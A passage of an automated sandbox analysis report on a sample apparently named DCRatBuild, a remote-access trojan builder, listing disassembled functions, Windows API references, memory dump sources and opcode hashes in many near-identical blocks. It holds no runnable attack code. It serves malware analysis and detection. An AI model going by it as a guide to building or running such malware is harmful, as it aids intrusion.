                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 6cb7a51ef98fbfd2377ba22f710883392f48dd6fadb5534b66768ca057f09321
                                      • Instruction ID: c416ebde8ed06d3cbf46f2bda1ba23bcd9b3a81961f64eb0115b07acb35b6108
                                      • Opcode Fuzzy Hash: 6cb7a51ef98fbfd2377ba22f710883392f48dd6fadb5534b66768ca057f09321
                                      • Instruction Fuzzy Hash: 66A0129216C0027C300C21006C26D76122CC4C1B313304409B007900C0D44058863831
                                      Function 00F1D983 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 66000e9a91b9995fc7af0d7fa466f19c070a39b2d1547a300ee3860b15c67f68
                                      • Instruction ID: c416ebde8ed06d3cbf46f2bda1ba23bcd9b3a81961f64eb0115b07acb35b6108
                                      • Opcode Fuzzy Hash: 66000e9a91b9995fc7af0d7fa466f19c070a39b2d1547a300ee3860b15c67f68
                                      • Instruction Fuzzy Hash: 66A0129216C0027C300C21006C26D76122CC4C1B313304409B007900C0D44058863831
                                      Function 00F1D98D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 39fa96ed914479695224310d516aa168ba177095f540699b76cdf11b2fe774ea
                                      • Instruction ID: c416ebde8ed06d3cbf46f2bda1ba23bcd9b3a81961f64eb0115b07acb35b6108
                                      • Opcode Fuzzy Hash: 39fa96ed914479695224310d516aa168ba177095f540699b76cdf11b2fe774ea
                                      • Instruction Fuzzy Hash: 66A0129216C0027C300C21006C26D76122CC4C1B313304409B007900C0D44058863831
                                      Function 00F1D979 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: f33287d3d1061cc8fe4e800c988dfb62a43e8a578fcb8965d73872d137325090
                                      • Instruction ID: c416ebde8ed06d3cbf46f2bda1ba23bcd9b3a81961f64eb0115b07acb35b6108
                                      • Opcode Fuzzy Hash: f33287d3d1061cc8fe4e800c988dfb62a43e8a578fcb8965d73872d137325090
                                      • Instruction Fuzzy Hash: 66A0129216C0027C300C21006C26D76122CC4C1B313304409B007900C0D44058863831
                                      Function 00F1D965 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 092528b4a3acd87f6ea0639545cc9f71e3a4101c9a702a2f50b5cc9ea3d528e3
                                      • Instruction ID: c416ebde8ed06d3cbf46f2bda1ba23bcd9b3a81961f64eb0115b07acb35b6108
                                      • Opcode Fuzzy Hash: 092528b4a3acd87f6ea0639545cc9f71e3a4101c9a702a2f50b5cc9ea3d528e3
                                      • Instruction Fuzzy Hash: 66A0129216C0027C300C21006C26D76122CC4C1B313304409B007900C0D44058863831
                                      Function 00F1D96F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 4151938ed0f0a5348be44a0a3cc94eaaba524307bc3a51477d0bd8e5b84ecd37
                                      • Instruction ID: c416ebde8ed06d3cbf46f2bda1ba23bcd9b3a81961f64eb0115b07acb35b6108
                                      • Opcode Fuzzy Hash: 4151938ed0f0a5348be44a0a3cc94eaaba524307bc3a51477d0bd8e5b84ecd37
                                      • Instruction Fuzzy Hash: 66A0129216C0027C300C21006C26D76122CC4C1B313304409B007900C0D44058863831
                                      Function 00F1D951 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 18000359da6eb7e05d761c25f6dadc42cc7e311c212efdc6dcbb9afeaaf3efe0
                                      • Instruction ID: c416ebde8ed06d3cbf46f2bda1ba23bcd9b3a81961f64eb0115b07acb35b6108
                                      • Opcode Fuzzy Hash: 18000359da6eb7e05d761c25f6dadc42cc7e311c212efdc6dcbb9afeaaf3efe0
                                      • Instruction Fuzzy Hash: 66A0129216C0027C300C21006C26D76122CC4C1B313304409B007900C0D44058863831
                                      Function 00F1D95B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 929c984bf89ca507bf9a2699251b1ea191666fdad5b09d30c602d0f0a7454177
                                      • Instruction ID: c416ebde8ed06d3cbf46f2bda1ba23bcd9b3a81961f64eb0115b07acb35b6108
                                      • Opcode Fuzzy Hash: 929c984bf89ca507bf9a2699251b1ea191666fdad5b09d30c602d0f0a7454177
                                      • Instruction Fuzzy Hash: 66A0129216C0027C300C21006C26D76122CC4C1B313304409B007900C0D44058863831
                                      Function 00F1D93D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: cd8f57fc051f19ccdac983b4f834cf5ed5c3ee8854e48ee4b77f5c77403b4041
                                      • Instruction ID: c416ebde8ed06d3cbf46f2bda1ba23bcd9b3a81961f64eb0115b07acb35b6108
                                      • Opcode Fuzzy Hash: cd8f57fc051f19ccdac983b4f834cf5ed5c3ee8854e48ee4b77f5c77403b4041
                                      • Instruction Fuzzy Hash: 66A0129216C0027C300C21006C26D76122CC4C1B313304409B007900C0D44058863831
                                      Function 00F1D91F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: b8642ddfa15d87a60b25b71a3bfe44459805e577eef577690eacd320cf230618
                                      • Instruction ID: c416ebde8ed06d3cbf46f2bda1ba23bcd9b3a81961f64eb0115b07acb35b6108
                                      • Opcode Fuzzy Hash: b8642ddfa15d87a60b25b71a3bfe44459805e577eef577690eacd320cf230618
                                      • Instruction Fuzzy Hash: 66A0129216C0027C300C21006C26D76122CC4C1B313304409B007900C0D44058863831
                                      Function 00F2B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AF1B: GetOEMCP.KERNEL32(00000000,?,?,00F2B1A5,?), ref: 00F2AF46
                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00F2B1EA,?,00000000), ref: 00F2B3C4
                                      • GetCPInfo.KERNEL32(00000000,00F2B1EA,?,?,?,00F2B1EA,?,00000000), ref: 00F2B3D7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CodeInfoPageValid
                                      • String ID:
                                      • API String ID: 546120528-0
                                      • Opcode ID: a3415a44990464b6a7062d2a80816c2b6dac05dcd12c1c3153269fbbd4e171f3
                                      • Instruction ID: 87793b97ef7dcf69b89741a1c9ff3f095bd5673fb238373a8d921b7d608abffc
                                      • Opcode Fuzzy Hash: a3415a44990464b6a7062d2a80816c2b6dac05dcd12c1c3153269fbbd4e171f3
                                      • Instruction Fuzzy Hash: BB515970D002259FDB20EF75E8C16BABBE5EF51320F18406ED8968B253D7399941FB91
                                      Function 00F01385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F01385
                                        • Part of subcall function 00F06057: __EH_prolog.LIBCMT ref: 00F0605C
                                        • Part of subcall function 00F0C827: __EH_prolog.LIBCMT ref: 00F0C82C
                                        • Part of subcall function 00F0C827: new.LIBCMT ref: 00F0C86F
                                        • Part of subcall function 00F0C827: new.LIBCMT ref: 00F0C893
                                      • new.LIBCMT ref: 00F013FE
                                        • Part of subcall function 00F0B07D: __EH_prolog.LIBCMT ref: 00F0B082
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 5602340d1a98e1d5d7ae861ab15a9090be42a3c84761e75c3b80adcb498add3d
                                      • Instruction ID: 0bddb4e631bd6d72510828f0e61dc9e43ca131b3a4ce3c2dbe296f9947716dd1
                                      • Opcode Fuzzy Hash: 5602340d1a98e1d5d7ae861ab15a9090be42a3c84761e75c3b80adcb498add3d
                                      • Instruction Fuzzy Hash: E24136B0805B409EE724DF7988859E7FBE5FF18310F444A2ED6EE83282DB366558DB11
                                      Function 00F01380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F01385
                                        • Part of subcall function 00F06057: __EH_prolog.LIBCMT ref: 00F0605C
                                        • Part of subcall function 00F0C827: __EH_prolog.LIBCMT ref: 00F0C82C
                                        • Part of subcall function 00F0C827: new.LIBCMT ref: 00F0C86F
                                        • Part of subcall function 00F0C827: new.LIBCMT ref: 00F0C893
                                      • new.LIBCMT ref: 00F013FE
                                        • Part of subcall function 00F0B07D: __EH_prolog.LIBCMT ref: 00F0B082
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 170e464dd93119925a7efb41907e30f9199b39cab49101f5aecb7c3e1a640dcb
                                      • Instruction ID: 1ddb9b9796cb8b245f1eda6857be0cb73a6d69bf86cb8a2a60507e0d49f79d04
                                      • Opcode Fuzzy Hash: 170e464dd93119925a7efb41907e30f9199b39cab49101f5aecb7c3e1a640dcb
                                      • Instruction Fuzzy Hash: 534144B0805B409EE724DF798885AE7FBE5FF18310F444A2ED5EE83282DB362554DB11
                                      Function 00F2B188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F28FA5: GetLastError.KERNEL32(?,00F40EE8,00F23E14,00F40EE8,?,?,00F23713,00000050,?,00F40EE8,00000200), ref: 00F28FA9
                                        • Part of subcall function 00F28FA5: _free.LIBCMT ref: 00F28FDC
                                        • Part of subcall function 00F28FA5: SetLastError.KERNEL32(00000000,?,00F40EE8,00000200), ref: 00F2901D
                                        • Part of subcall function 00F28FA5: _abort.LIBCMT ref: 00F29023
                                        • Part of subcall function 00F2B2AE: _abort.LIBCMT ref: 00F2B2E0
                                        • Part of subcall function 00F2B2AE: _free.LIBCMT ref: 00F2B314
                                        • Part of subcall function 00F2AF1B: GetOEMCP.KERNEL32(00000000,?,?,00F2B1A5,?), ref: 00F2AF46
                                      • _free.LIBCMT ref: 00F2B200
                                      • _free.LIBCMT ref: 00F2B236
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free$ErrorLast_abort
                                      • String ID:
                                      • API String ID: 2991157371-0
                                      • Opcode ID: 14b967567dbd20955855c56ae4db641c81f3490b8d5a80ea457dc3d6e9a23255
                                      • Instruction ID: 63cacd96a08d396e59a89d4ab7027600a083c8efbf41401c9fc34980c21ba49d
                                      • Opcode Fuzzy Hash: 14b967567dbd20955855c56ae4db641c81f3490b8d5a80ea457dc3d6e9a23255
                                      • Instruction Fuzzy Hash: 7831F431D04228EFDB11EFA9E841BADB7E1EF40330F254099E8149B291EB799D42EB50
                                      Function 00F0971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00F09EDC,?,?,00F07867), ref: 00F097A6
                                      • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00F09EDC,?,?,00F07867), ref: 00F097DB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
